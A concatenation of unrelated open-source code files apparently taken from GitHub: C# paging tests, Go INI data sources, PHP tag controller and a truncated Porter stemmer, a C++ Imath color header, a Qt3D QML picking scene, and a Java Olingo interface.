        var pagedList1 = data.ToPagedList(2, 1);
        var pagedList2 = data.ToPagedList(3, 1);
        var pagedList3 = data.ToPagedList(4, 1);

        //assert: a page past the end is NOT reported as the last page
        Assert.False(pagedList1.IsLastPage);
        Assert.True(pagedList2.IsLastPage);
        Assert.False(pagedList3.IsLastPage);
    }

    [Fact]
    public void DataSet_OneAndTwo_PageSize_One_PageNumber_Two_FirstValue_Is_Two()
    {
        //arrange
        var data = new[] { 1, 2 };

        //act
        var pagedList = data.ToPagedList(2, 1);

        //assert
        Assert.Equal(2, pagedList[0]);
    }

    [Fact]
    public void DataSet_OneThroughTen_PageSize_Five_PageNumber_One_FirstItemOnPage_Is_One()
    {
        //arrange
        var data = Enumerable.Range(1, 10);

        //act
        var pagedList = data.ToPagedList(1, 5);

        //assert
        Assert.Equal(1, pagedList.FirstItemOnPage);
    }

    [Fact]
    public void DataSet_OneThroughTen_PageSize_Five_PageNumber_Two_FirstItemOnPage_Is_Six()
    {
        //arrange
        var data = Enumerable.Range(1, 10);

        //act
        var pagedList = data.ToPagedList(2, 5);

        //assert
        Assert.Equal(6, pagedList.FirstItemOnPage);
    }

    [Fact]
    public void DataSet_OneThroughTen_PageSize_Five_PageNumber_One_LastItemOnPage_Is_Five()
    {
        //arrange
        var data = Enumerable.Range(1, 10);

        //act
        var pagedList = data.ToPagedList(1, 5);

        //assert
        Assert.Equal(5, pagedList.LastItemOnPage);
    }

    [Fact]
    public void DataSet_OneThroughTen_PageSize_Five_PageNumber_Two_LastItemOnPage_Is_Ten()
    {
        //arrange
        var data = Enumerable.Range(1, 10);

        //act
        var pagedList = data.ToPagedList(2, 5);

        //assert
        Assert.Equal(10, pagedList.LastItemOnPage);
    }

    [Fact]
    public void DataSet_OneThroughEight_PageSize_Five_PageNumber_Two_LastItemOnPage_Is_Eight()
    {
        //arrange
        var data = Enumerable.Range(1, 8);

        //act
        var pagedList = data.ToPagedList(2, 5);

        //assert: a short final page ends at the data's last item
        Assert.Equal(8, pagedList.LastItemOnPage);
    }

    [Theory]
    [InlineData(new[] { 1, 2, 3 }, 1, 1, false, true)]
    [InlineData(new[] { 1, 2, 3 }, 2, 1, true, true)]
    [InlineData(new[] { 1, 2, 3 }, 3, 1, true, false)]
    [InlineData(new[] { 1, 2, 3 }, 1, 3, false, false)]
    [InlineData(new[] { 1, 2, 3 }, 2, 3, false, false)]
    [InlineData(new int[] {}, 1, 3, false, false)]
    public void Theory_HasPreviousPage_And_HasNextPage_Are_Correct(int[] integers, int pageNumber, int pageSize,
        bool expectedHasPrevious, bool expectedHasNext)
    {
        //arrange
        var data = integers;

        //act
        var pagedList = data.ToPagedList(pageNumber, pageSize);

        //assert
        Assert.Equal(expectedHasPrevious, pagedList.HasPreviousPage);
        Assert.Equal(expectedHasNext, pagedList.HasNextPage);
    }

    [Theory]
    [InlineData(new[] { 1, 2, 3 }, 1, 1, true, false)]
    [InlineData(new[] { 1, 2, 3 }, 2, 1, false, false)]
    [InlineData(new[] { 1, 2, 3 }, 3, 1, false, true)]
    [InlineData(new[] { 1, 2, 3 }, 1, 3, true, true)] // Page 1 of 1
    [InlineData(new[] { 1, 2, 3 }, 2, 3, false, false)] // Page 2 of 1
    [InlineData(new int[] {}, 1, 3, false, false)] // Page 1 of 0
    public void Theory_IsFirstPage_And_IsLastPage_Are_Correct(int[] integers, int pageNumber, int pageSize,
        bool expectedIsFirstPage, bool expectedIsLastPage)
    {
        //arrange
        var data = integers;

        //act
        var pagedList = data.ToPagedList(pageNumber, pageSize);

        //assert
        Assert.Equal(expectedIsFirstPage, pagedList.IsFirstPage);
        Assert.Equal(expectedIsLastPage, pagedList.IsLastPage);
    }

    [Theory]
    [InlineData(new[] { 1, 2, 3 }, 1, 3)]
    [InlineData(new[] { 1, 2, 3 }, 3, 1)]
    [InlineData(new[] { 1 }, 1, 1)]
    [InlineData(new[] { 1, 2, 3 }, 2, 2)]
    [InlineData(new[] { 1, 2, 3, 4 }, 2, 2)]
    [InlineData(new[] { 1, 2, 3, 4, 5 }, 2, 3)]
    [InlineData(new int[] {}, 1, 0)]
    public void Theory_PageCount_Is_Correct(int[] integers, int pageSize, int expectedNumberOfPages)
    {
        //arrange
        var data = integers;

        //act
        var pagedList = data.ToPagedList(1, pageSize);

        //assert
        Assert.Equal(expectedNumberOfPages, pagedList.PageCount);
    }

    [Fact]
    public void PageCount_Is_Correct_Big()
    {
        //arrange: one item past a full page forces a second page
        var data = Enumerable.Range(1, 100001).ToArray();

        //act
        var pagedList = data.ToPagedList(1, 100000);

        //assert
        Assert.Equal(2, pagedList.PageCount);
    }

    [Theory]
    [InlineData(new[] { 1, 2, 3, 4, 5 }, 1, 2, 1, 2)]
    [InlineData(new[] { 1, 2, 3, 4, 5 }, 2, 2, 3, 4)]
    [InlineData(new[] { 1, 2, 3, 4, 5 }, 3, 2, 5, 5)]
    [InlineData(new[] { 1, 2, 3, 4, 5 }, 4, 2, 0, 0)]
    [InlineData(new int[] {}, 1, 2, 0, 0)]
    public void Theory_FirstItemOnPage_And_LastItemOnPage_Are_Correct(int[] integers, int pageNumber, int pageSize, int expectedFirstItemOnPage, int expectedLastItemOnPage)
    {
        //arrange
        var data = integers;

        //act
        var pagedList = data.ToPagedList(pageNumber, pageSize);

        //assert
        Assert.Equal(expectedFirstItemOnPage, pagedList.FirstItemOnPage);
        Assert.Equal(expectedLastItemOnPage, pagedList.LastItemOnPage);
    }
}
} | {
"pile_set_name": "Github"
} |
// Copyright 2019 Unknwon
//
// Licensed under the Apache License, Version 2.0 (the "License"): you may
// not use this file except in compliance with the License. You may obtain
// a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
// WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
// License for the specific language governing permissions and limitations
// under the License.
package ini
import (
"bytes"
"fmt"
"io"
"io/ioutil"
"os"
)
// Compile-time assertions that every source type implements dataSource.
var (
	_ dataSource = (*sourceFile)(nil)
	_ dataSource = (*sourceData)(nil)
	_ dataSource = (*sourceReadCloser)(nil)
)

// dataSource is an interface that returns an object which can be read and closed.
type dataSource interface {
	ReadCloser() (io.ReadCloser, error)
}
// sourceFile represents an object that contains content on the local file system.
type sourceFile struct {
name string
}
func (s sourceFile) ReadCloser() (_ io.ReadCloser, err error) {
return os.Open(s.name)
}
// sourceData represents an object that contains content in memory.
type sourceData struct {
	data []byte
}

// ReadCloser wraps the in-memory bytes in a no-op closer; every call
// returns a fresh reader positioned at the start of the data.
func (s *sourceData) ReadCloser() (io.ReadCloser, error) {
	return ioutil.NopCloser(bytes.NewReader(s.data)), nil
}
// sourceReadCloser represents an input stream with Close method.
type sourceReadCloser struct {
	reader io.ReadCloser
}

// ReadCloser hands back the caller-supplied stream as-is; unlike the other
// sources it can therefore only be consumed once.
func (s *sourceReadCloser) ReadCloser() (io.ReadCloser, error) {
	return s.reader, nil
}
// parseDataSource normalizes the accepted input kinds -- a file name, an
// in-memory byte slice, or an already-open stream -- into a dataSource.
// Any other type yields an error.
func parseDataSource(source interface{}) (dataSource, error) {
	if name, ok := source.(string); ok {
		return sourceFile{name}, nil
	}
	if blob, ok := source.([]byte); ok {
		return &sourceData{blob}, nil
	}
	if stream, ok := source.(io.ReadCloser); ok {
		return &sourceReadCloser{stream}, nil
	}
	return nil, fmt.Errorf("error parsing data source: unknown type %q", source)
}
| {
"pile_set_name": "Github"
} |
@array = qw/one two three/;
pop @array;
@ar<caret>ray; | {
"pile_set_name": "Github"
} |
<?php
/**
* Abstract Tag Controller.
*
* @category Anahita
*
* @author Rastin Mehr <[email protected]>
* @copyright 2008 - 2015 rmdStudio Inc.
* @license GNU GPLv3 <http://www.gnu.org/licenses/gpl-3.0.html>
*
* @link http://www.GetAnahita.com
*/
abstract class ComTagsControllerAbstract extends ComBaseControllerService
{
/**
* Constructor.
*
* @param AnConfig $config An optional AnConfig object with configuration options.
*/
public function __construct(AnConfig $config)
{
parent::__construct($config);
$this->registerCallback(array(
'after.delete',
'after.add', ),
array($this, 'redirect'));
}
/**
* Initializes the options for the object.
*
* Called from {@link __construct()} as a first step of object instantiation.
*
* @param object An optional AnConfig object with configuration options.
*/
protected function _initialize(AnConfig $config)
{
$config->append(array(
'request' => array(
'scope' => '',
'sort' => 'trending',
'days' => AnRequest::get('get.days', 'int', 7),
),
));
parent::_initialize($config);
$this->getService('anahita:language')->load('com_tags');
}
/**
* Read Service.
*
* @param AnCommandContext $context
*/
protected function _actionRead(AnCommandContext $context)
{
$pkg = $this->getIdentifier()->package;
$name = $this->getIdentifier()->name;
$this->getToolbar('menubar')->setTitle(sprintf(AnTranslator::_('COM-'.$pkg.'-TERM'), $name));
$entity = parent::_actionRead($context);
if ($this->scope) {
$entity->taggables->scope($this->scope);
}
$alias = $entity
->taggables
->getRepository()
->getResources()
->main()
->getAlias();
if ($this->sort == 'top') {
$conditions = '(COALESCE(:alias.comment_count,0) + COALESCE(:alias.vote_up_count,0) + COALESCE(:alias.subscriber_count,0) + COALESCE(:alias.follower_count,0))';
$conditions = str_replace(':alias', $alias, $conditions);
$entity->taggables->order($conditions, 'DESC')->groupby('@col(taggable.id)');
} else {
$entity->taggables->order($alias.'.created_on', 'DESC');
}
$entity->taggables->limit($this->limit, $this->start);
// error_log(str_replace('#_', 'jos', $entity->taggables->getQuery()));
return $entity;
}
/**
* Browse Service.
*
* @param AnCommandContext $context
*/
protected function _actionBrowse(AnCommandContext $context)
{
$entities = parent::_actionBrowse($context);
if(in_array($this->sort, array('top', 'trending')) && $this->q == '') {
$package = $this->getIdentifier()->package;
$entities->select('COUNT(*) AS count')
->join('RIGHT', 'edges AS edge', '@col(id) = edge.node_a_id')
->where('edge.type', 'LIKE', '%com:'.$package.'.domain.entity.tag')->group('@col(id)')
->order('count', 'DESC');
if ($this->sort == 'trending') {
$now = new AnDate();
$entities->where('edge.created_on', '>', $now->addDays(-(int) $this->days)->getDate());
}
}
return $entities;
}
/**
* Set the default Tag View.
*
* @param AnCommandContext $context Context parameter
*
* @return ComTagsControllerDefault
*/
public function setView($view)
{
parent::setView($view);
if (!$this->_view instanceof ComBaseViewAbstract) {
$name = AnInflector::isPlural($this->view) ? 'tags' : 'tag';
$defaults[] = 'ComTagsView'.ucfirst($view).ucfirst($this->_view->name);
$defaults[] = 'ComTagsView'.ucfirst($name).ucfirst($this->_view->name);
register_default(array('identifier' => $this->_view, 'default' => $defaults));
}
return $this;
}
/**
 * Set the necessary redirect after an action.
 *
 * Redirects to the plural (browse) view of the current resource; after an
 * 'add' action the id of the newly created item is appended to the URL.
 *
 * @param AnCommandContext $context Command chain context
 */
public function redirect(AnCommandContext $context)
{
    $url = array();
    $url['view'] = AnInflector::pluralize($this->getIdentifier()->name);
    $url['option'] = $this->getIdentifier()->package;
    if ($context->action == 'add') {
        $url['id'] = $this->getItem()->id;
    }
    $this->getResponse()->setRedirect(route($url));
}
/**
 * Fetches the taggable node identified by $this->taggable_id and stores it
 * in the controller state.
 *
 * @param AnCommandContext $context Command chain context
 *
 * @return object The fetched taggable node
 *
 * @throws LibBaseControllerExceptionNotFound If no node with that id exists
 */
public function fetchTaggable(AnCommandContext $context)
{
    $this->taggable = AnService::get('repos:nodes.node')
        ->getQuery()
        ->disableChain()
        ->id($this->taggable_id)
        ->fetch();

    if (!$this->taggable) {
        // Fixed copy-paste message: this controller deals with taggable
        // (not "locatable") objects.
        throw new LibBaseControllerExceptionNotFound('Taggable object does not exist');
    }

    return $this->taggable;
}
}
| {
"pile_set_name": "Github"
} |
///////////////////////////////////////////////////////////////////////////
//
// Copyright (c) 2002-2012, Industrial Light & Magic, a division of Lucas
// Digital Ltd. LLC
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Industrial Light & Magic nor the names of
// its contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
///////////////////////////////////////////////////////////////////////////
#ifndef INCLUDED_IMATHCOLORALGO_H
#define INCLUDED_IMATHCOLORALGO_H
#include "ImathColor.h"
#include "ImathExport.h"
#include "ImathMath.h"
#include "ImathLimits.h"
#include "ImathNamespace.h"
IMATH_INTERNAL_NAMESPACE_HEADER_ENTER
//
// Non-templated helper routines for color conversion.
// These routines eliminate type warnings under g++.
//
IMATH_EXPORT Vec3<double> hsv2rgb_d(const Vec3<double> &hsv);
IMATH_EXPORT Color4<double> hsv2rgb_d(const Color4<double> &hsv);
IMATH_EXPORT Vec3<double> rgb2hsv_d(const Vec3<double> &rgb);
IMATH_EXPORT Color4<double> rgb2hsv_d(const Color4<double> &rgb);
//
// Color conversion functions and general color algorithms
//
// hsv2rgb(), rgb2hsv(), rgb2packed(), packed2rgb()
// see each function definition for details.
//
template<class T>
Vec3<T>
hsv2rgb(const Vec3<T> &hsv)
{
    //
    // Convert an HSV triple to RGB.  Integral types are normalized to
    // [0,1], converted through the double-precision helper, then
    // rescaled to the type's full range; floating-point types go
    // through the helper directly.
    //

    if ( limits<T>::isIntegral() )
    {
        const double scale = double (limits<T>::max());

        Vec3<double> rgb = hsv2rgb_d (Vec3<double> (hsv.x / scale,
                                                    hsv.y / scale,
                                                    hsv.z / scale));

        return Vec3<T> ((T) (rgb.x * scale),
                        (T) (rgb.y * scale),
                        (T) (rgb.z * scale));
    }

    Vec3<double> rgb = hsv2rgb_d (Vec3<double> (hsv.x, hsv.y, hsv.z));
    return Vec3<T> ((T) rgb.x, (T) rgb.y, (T) rgb.z);
}
//
// Convert an HSVA color to RGBA.  Integral types are normalized to
// [0,1] before conversion and rescaled afterwards; the alpha channel
// receives the same scaling but is otherwise untouched by the
// hue/saturation/value math (see hsv2rgb_d).
//
// NOTE(review): this overload normalizes with float(limits<T>::max())
// while the Vec3 overload above uses double(...).  Presumably
// unintentional, but left as-is -- changing it would perturb low-order
// bits of existing results.  Confirm before "fixing".
//
template<class T>
Color4<T>
hsv2rgb(const Color4<T> &hsv)
{
    if ( limits<T>::isIntegral() )
    {
        Color4<double> v = Color4<double>(hsv.r / float(limits<T>::max()),
                                          hsv.g / float(limits<T>::max()),
                                          hsv.b / float(limits<T>::max()),
                                          hsv.a / float(limits<T>::max()));
        Color4<double> c = hsv2rgb_d(v);
        return Color4<T>((T) (c.r * limits<T>::max()),
                         (T) (c.g * limits<T>::max()),
                         (T) (c.b * limits<T>::max()),
                         (T) (c.a * limits<T>::max()));
    }
    else
    {
        Color4<double> v = Color4<double>(hsv.r, hsv.g, hsv.b, hsv.a);
        Color4<double> c = hsv2rgb_d(v);
        return Color4<T>((T) c.r, (T) c.g, (T) c.b, (T) c.a);
    }
}
//
// Convert an RGB triple to HSV.  Integral types are normalized to
// [0,1], converted through rgb2hsv_d, and the result is rescaled back
// to the type's full range.  Floating-point components are assumed to
// already be in [0,1] -- nothing here clamps (TODO confirm callers).
//
template<class T>
Vec3<T>
rgb2hsv(const Vec3<T> &rgb)
{
    if ( limits<T>::isIntegral() )
    {
        Vec3<double> v = Vec3<double>(rgb.x / double(limits<T>::max()),
                                      rgb.y / double(limits<T>::max()),
                                      rgb.z / double(limits<T>::max()));
        Vec3<double> c = rgb2hsv_d(v);
        return Vec3<T>((T) (c.x * limits<T>::max()),
                       (T) (c.y * limits<T>::max()),
                       (T) (c.z * limits<T>::max()));
    }
    else
    {
        Vec3<double> v = Vec3<double>(rgb.x, rgb.y, rgb.z);
        Vec3<double> c = rgb2hsv_d(v);
        return Vec3<T>((T) c.x, (T) c.y, (T) c.z);
    }
}
//
// Convert an RGBA color to HSVA.  Same scheme as the Vec3 overload;
// alpha is scaled along with the other channels but not otherwise
// transformed.
//
// NOTE(review): normalizes with float(limits<T>::max()) where the Vec3
// overload uses double(...) -- see the matching note on hsv2rgb above.
//
template<class T>
Color4<T>
rgb2hsv(const Color4<T> &rgb)
{
    if ( limits<T>::isIntegral() )
    {
        Color4<double> v = Color4<double>(rgb.r / float(limits<T>::max()),
                                          rgb.g / float(limits<T>::max()),
                                          rgb.b / float(limits<T>::max()),
                                          rgb.a / float(limits<T>::max()));
        Color4<double> c = rgb2hsv_d(v);
        return Color4<T>((T) (c.r * limits<T>::max()),
                         (T) (c.g * limits<T>::max()),
                         (T) (c.b * limits<T>::max()),
                         (T) (c.a * limits<T>::max()));
    }
    else
    {
        Color4<double> v = Color4<double>(rgb.r, rgb.g, rgb.b, rgb.a);
        Color4<double> c = rgb2hsv_d(v);
        return Color4<T>((T) c.r, (T) c.g, (T) c.b, (T) c.a);
    }
}
//
// Pack an RGB triple into a 32-bit PackedColor: x in bits 0-7, y in
// bits 8-15, z in bits 16-23, with alpha forced to 0xFF.  Integral
// inputs are normalized and re-dispatched through the float overload;
// floating-point inputs are assumed to be in [0,1] -- values outside
// that range are not clamped (TODO confirm).
//
template <class T>
PackedColor
rgb2packed(const Vec3<T> &c)
{
    if ( limits<T>::isIntegral() )
    {
        float x = c.x / float(limits<T>::max());
        float y = c.y / float(limits<T>::max());
        float z = c.z / float(limits<T>::max());

        return rgb2packed( V3f(x,y,z) );
    }
    else
    {
        return ( (PackedColor) (c.x * 255) |
                (((PackedColor) (c.y * 255)) << 8) |
                (((PackedColor) (c.z * 255)) << 16) | 0xFF000000 );
    }
}
//
// Pack an RGBA color into a 32-bit PackedColor: r in bits 0-7, g in
// bits 8-15, b in bits 16-23, a in bits 24-31.  Integral inputs are
// normalized and re-dispatched through the float overload; floating
// point inputs are assumed to be in [0,1] (not clamped).
//
template <class T>
PackedColor
rgb2packed(const Color4<T> &c)
{
    if ( limits<T>::isIntegral() )
    {
        float r = c.r / float(limits<T>::max());
        float g = c.g / float(limits<T>::max());
        float b = c.b / float(limits<T>::max());
        float a = c.a / float(limits<T>::max());

        return rgb2packed( C4f(r,g,b,a) );
    }
    else
    {
        return ( (PackedColor) (c.r * 255) |
                (((PackedColor) (c.g * 255)) << 8) |
                (((PackedColor) (c.b * 255)) << 16) |
                (((PackedColor) (c.a * 255)) << 24));
    }
}
//
// This function can't return the result because the template
// parameter would not be in the function signature.  So instead,
// the result is passed in as an output argument.
//
template <class T>
void
packed2rgb(PackedColor packed, Vec3<T> &out)
{
    //
    // Unpack a 32-bit color (bits 0-7 -> x, 8-15 -> y, 16-23 -> z;
    // the alpha byte is ignored) into 'out'.  Byte values 0-255 are
    // rescaled to the integral type's full range, or to [0,1] for
    // floating-point types.  The result is written through the 'out'
    // parameter so that T can be deduced.
    //

    const PackedColor xByte = packed & 0xFF;
    const PackedColor yByte = (packed & 0xFF00) >> 8;
    const PackedColor zByte = (packed & 0xFF0000) >> 16;

    if ( limits<T>::isIntegral() )
    {
        T f = limits<T>::max() / ((PackedColor)0xFF);
        out.x = xByte * f;
        out.y = yByte * f;
        out.z = zByte * f;
    }
    else
    {
        T f = T(1) / T(255);
        out.x = xByte * f;
        out.y = yByte * f;
        out.z = zByte * f;
    }
}
//
// Unpack a 32-bit color (bits 0-7 -> r, 8-15 -> g, 16-23 -> b,
// 24-31 -> a) into 'out', rescaling 0-255 to the integral type's full
// range or to [0,1] for floating-point types.  Result returned via
// the 'out' argument so T can be deduced.
//
template <class T>
void
packed2rgb(PackedColor packed, Color4<T> &out)
{
    if ( limits<T>::isIntegral() )
    {
        T f = limits<T>::max() / ((PackedColor)0xFF);
        out.r = (packed & 0xFF) * f;
        out.g = ((packed & 0xFF00) >> 8) * f;
        out.b = ((packed & 0xFF0000) >> 16) * f;
        out.a = ((packed & 0xFF000000) >> 24) * f;
    }
    else
    {
        T f = T(1) / T(255);
        out.r = (packed & 0xFF) * f;
        out.g = ((packed & 0xFF00) >> 8) * f;
        out.b = ((packed & 0xFF0000) >> 16) * f;
        out.a = ((packed & 0xFF000000) >> 24) * f;
    }
}
IMATH_INTERNAL_NAMESPACE_HEADER_EXIT
#endif // INCLUDED_IMATHCOLORALGO_H
| {
"pile_set_name": "Github"
} |
---
# vars file for cifv2
| {
"pile_set_name": "Github"
} |
/****************************************************************************
**
** Copyright (C) 2018 Klaralvdalens Datakonsult AB (KDAB).
** Contact: https://www.qt.io/licensing/
**
** This file is part of the Qt3D module of the Qt Toolkit.
**
** $QT_BEGIN_LICENSE:BSD$
** Commercial License Usage
** Licensees holding valid commercial Qt licenses may use this file in
** accordance with the commercial license agreement provided with the
** Software or, alternatively, in accordance with the terms contained in
** a written agreement between you and The Qt Company. For licensing terms
** and conditions see https://www.qt.io/terms-conditions. For further
** information use the contact form at https://www.qt.io/contact-us.
**
** BSD License Usage
** Alternatively, you may use this file under the terms of the BSD license
** as follows:
**
** "Redistribution and use in source and binary forms, with or without
** modification, are permitted provided that the following conditions are
** met:
** * Redistributions of source code must retain the above copyright
** notice, this list of conditions and the following disclaimer.
** * Redistributions in binary form must reproduce the above copyright
** notice, this list of conditions and the following disclaimer in
** the documentation and/or other materials provided with the
** distribution.
** * Neither the name of The Qt Company Ltd nor the names of its
** contributors may be used to endorse or promote products derived
** from this software without specific prior written permission.
**
**
** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
** "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
** LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
** A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
** OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
** LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
** DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
** THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
** (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
** OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
**
** $QT_END_LICENSE$
**
****************************************************************************/
import Qt3D.Core 2.0
import Qt3D.Render 2.13
import Qt3D.Extras 2.0
import QtQuick.Window 2.0
// Root scene entity: a window, a perspective camera, a minimal framegraph
// with triangle-accurate picking enabled, and two pickable cubes at
// different distances from the camera (exercises priority picking).
Entity {
    id: sceneRoot

    // Top-level window the scene is rendered into (see RenderSurfaceSelector).
    Window {
        id: win
        width: 600
        height: 600
        visible: true
    }

    // Perspective camera at z = -40 looking at the origin.
    Camera {
        id: camera
        projectionType: CameraLens.PerspectiveProjection
        fieldOfView: 45
        nearPlane : 0.1
        farPlane : 1000.0
        position: Qt.vector3d( 0.0, 0.0, -40.0 )
        upVector: Qt.vector3d( 0.0, 1.0, 0.0 )
        viewCenter: Qt.vector3d( 0.0, 0.0, 0.0 )
    }

    components: [
        RenderSettings {
            // Framegraph: render the full viewport into 'win'; a first,
            // non-drawing pass clears color+depth, then the scene is drawn
            // through 'camera'.
            activeFrameGraph: Viewport {
                normalizedRect: Qt.rect(0.0, 0.0, 1.0, 1.0)

                RenderSurfaceSelector {
                    surface: win

                    ClearBuffers {
                        buffers : ClearBuffers.ColorDepthBuffer
                        NoDraw {}
                    }
                    CameraSelector {
                        camera: camera
                    }
                }
            }
            // Triangle-level picking on both front and back faces;
            // NearestPriorityPick selects among overlapping hits.
            pickingSettings {
                pickResultMode: PickingSettings.NearestPriorityPick
                pickMethod: PickingSettings.TrianglePicking
                faceOrientationPickingMode: PickingSettings.FrontAndBackFace
            }
        }
    ]

    // Mesh and material shared by both pickable cubes.
    CuboidMesh { id: cubeMesh }
    PhongMaterial { id: material }

    // Entity 1: cube at the origin.
    Entity {
        property ObjectPicker picker: ObjectPicker {
            id: picker1
            objectName: "Picker1"
        }
        property Transform transform: Transform {
            translation: Qt.vector3d(0, 0, 0)
            scale: 2.0
        }
        components: [cubeMesh, material, picker1, transform]
    }

    // Entity 2: slightly larger cube, farther from the camera (z = 10).
    Entity {
        property ObjectPicker picker: ObjectPicker {
            id: picker2
            objectName: "Picker2"
        }
        property Transform transform: Transform {
            translation: Qt.vector3d(0, 0, 10)
            scale: 2.5
        }
        components: [cubeMesh, material, picker2, transform]
    }
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.olingo.client.api.domain;
import java.net.URI;
import java.util.List;
/**
 * OData entity collection. If pagination was used to get this instance,
 * the forward page navigation URI will be available via {@link #getNext()}.
 */
public interface ClientEntitySet extends ClientInvokeResult, ClientAnnotatable {

  /**
   * Gets the next page link.
   *
   * @return next page link; {@code null} if there is a single page or the last page has been reached.
   */
  URI getNext();

  /**
   * Gets the contained entities.
   *
   * @return this entity set's entities.
   */
  List<ClientEntity> getEntities();

  /**
   * Gets the in-line count.
   *
   * @return in-line count value.
   */
  Integer getCount();

  /**
   * Sets the in-line count.
   *
   * @param count in-line count value.
   */
  void setCount(final int count);

  /**
   * Gets the delta link, if present.
   *
   * @return delta link if it exists; {@code null} otherwise.
   */
  URI getDeltaLink();

  /**
   * Sets the delta link.
   *
   * @param deltaLink delta link.
   */
  void setDeltaLink(URI deltaLink);

  /**
   * Searches for an operation with the given title.
   *
   * @param title operation to look for
   * @return the operation if one with the given title is found, {@code null} otherwise
   */
  ClientOperation getOperation(String title);

  /**
   * Gets the operations.
   *
   * @return operations.
   */
  List<ClientOperation> getOperations();
}
| {
"pile_set_name": "Github"
} |
<?php
/**
* Part of the Joomla Framework Language Package
*
* @copyright Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
* @copyright Copyright (C) 2005 Richard Heyes (http://www.phpguru.org/). All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/
namespace Joomla\Language\Stemmer;
use Joomla\Language\Stemmer;
/**
 * Porter English stemmer class.
 *
 * This class was adapted from one written by Richard Heyes.
 * See copyright and link information above.
 *
 * @since 1.0
 */
class Porteren extends Stemmer
{
    /**
     * Regex for matching a consonant.
     *
     * @var string
     * @since 1.0
     */
    private static $regex_consonant = '(?:[bcdfghjklmnpqrstvwxz]|(?<=[aeiou])y|^y)';

    /**
     * Regex for matching a vowel
     *
     * @var string
     * @since 1.0
     */
    private static $regex_vowel = '(?:[aeiou]|(?<![aeiou])y)';

    /**
     * Method to stem a token and return the root.
     *
     * Results are memoized in $this->cache per language.
     *
     * @param string $token The token to stem.
     * @param string $lang The language of the token.
     *
     * @return string The root token.
     *
     * @since 1.0
     */
    public function stem($token, $lang)
    {
        // Check if the token is long enough to merit stemming.
        if (strlen($token) <= 2)
        {
            return $token;
        }

        // This stemmer only handles English.
        if ($lang !== 'en')
        {
            return $token;
        }

        // Stem the token if it is not in the cache.
        if (!isset($this->cache[$lang][$token]))
        {
            // Apply the Porter algorithm steps in order.
            $result = $token;
            $result = self::step1ab($result);
            $result = self::step1c($result);
            $result = self::step2($result);
            $result = self::step3($result);
            $result = self::step4($result);
            $result = self::step5($result);

            // Add the token to the cache.
            $this->cache[$lang][$token] = $result;
        }

        return $this->cache[$lang][$token];
    }

    /**
     * Step 1: plurals and -ed / -ing suffixes.
     *
     * @param string $word The token to stem.
     *
     * @return string
     *
     * @since 1.0
     */
    private static function step1ab($word)
    {
        // Part a
        if (substr($word, -1) == 's')
        {
            self::replace($word, 'sses', 'ss')
            or self::replace($word, 'ies', 'i')
            or self::replace($word, 'ss', 'ss')
            or self::replace($word, 's', '');
        }

        // Part b
        if (substr($word, -2, 1) != 'e' or !self::replace($word, 'eed', 'ee', 0))
        {
            // First rule
            $v = self::$regex_vowel;

            // Check ing and ed
            // Note use of && and OR, for precedence reasons
            if (preg_match("#$v+#", substr($word, 0, -3)) && self::replace($word, 'ing', '')
                or preg_match("#$v+#", substr($word, 0, -2)) && self::replace($word, 'ed', ''))
            {
                // If one of above two test successful
